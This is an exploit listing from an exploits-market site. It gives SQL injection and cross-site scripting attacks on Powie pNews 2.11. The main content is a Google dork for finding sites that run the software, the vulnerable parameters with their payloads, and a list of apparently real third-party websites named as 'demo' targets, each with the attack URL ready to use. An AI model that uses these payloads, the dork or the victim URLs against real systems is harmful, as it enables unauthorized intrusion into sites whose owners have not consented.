[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Powie pNews 2.11 - (SQL Injection / XSS) Remote Vulnerabilities

Author
GoLd_M
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18849
Category
web applications
Date add
27-06-2012
Platform
php
# Exploit Title: Powie pNews 2.11 - (SQL Injection / XSS) Remote Vulnerabilities
# Date: 26/6/2012
# Author: GoLd_M
# Vendor or Software Link: http://powie.de/ 
# Version: 2.11
# Category:: (SQL Injection / XSS)
# Google dork: intext:"-- pNews 2.11 © Thomas Ehrhardt, 2000-2011 --"
# Tested on: Xp SP 2
# Demo site: 
# Ex : 	/index.php?shownews=1 [SQL] 
# Ex : 	/archiv.php?kategorie="><script>alert(1337);</script> [XSS]
# Demo : http://www.fc-deetz.de/pnews/index.php?shownews=38%27
# Demo : http://www.fc-deetz.de/pnews/index.php?shownews=38%27
http://www.fc-deetz.de/pnews/archiv.php?kategorie="><script>alert(1337);</script>
http://www.g33k.de/pnews/index.php?shownews=151%27
http://www.g33k.de/pnews//archiv.php?kategorie="><script>alert(1337);</script>
http://www.sf-lieme.de/pnews/index.php?shownews=1319%27
http://www.sf-lieme.de/pnews//archiv.php?kategorie="><script>alert(1337);</script>



#  0day.today [2024-09-28]  #